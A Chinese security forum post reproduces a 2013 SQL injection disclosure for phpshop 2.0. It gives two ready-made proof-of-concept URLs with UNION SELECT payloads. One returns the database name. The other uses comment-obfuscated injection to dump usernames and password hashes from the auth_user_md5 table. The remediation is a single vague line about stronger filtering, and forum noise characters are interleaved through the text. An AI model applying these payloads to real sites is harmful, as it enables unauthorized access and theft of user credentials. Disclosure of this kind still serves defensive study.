找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1993|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
* x" C6 ~# D, b+ }6 U: f4 m
% O& O; n$ U* p1 h3 P# u2 X. s作者 : By onestree
! k# \. X" D; d1 v/ m下载地址 : http://code.google.com/p/phpshop/downloads/list
4 }" r0 ^4 B; H- G5 Y测试地址: windows 7 / ubuntu! j7 ^3 t' Y0 b5 j
  E1 s7 x, e" ], i) D( w

+ t. ~* ~+ M: L2 ESQLi p0c:
" e" n9 F* z& C5 T  n
: \/ n+ O% Y: Z! K# P7 S==================
+ M2 K% U) n$ W+ g& o 0 E* r0 w- Y! x) s% u7 j
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
+ S; ^/ X9 s5 S0 C1 Nunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --  ~3 h+ v8 E* m$ D0 R: {% }
4 V6 ~0 u* B; \% ]' X
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--( M  A' {9 v, @: C* Z

+ A6 }( Z8 n8 D0 E1 o1 \8 N修复:
) F1 f" S* G4 I/ y加强过滤! ?4 t! i9 p& H

, ?: X/ T- Y0 {- n- m9 J) z
. x0 ^) D& g5 v/ C- E+ h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表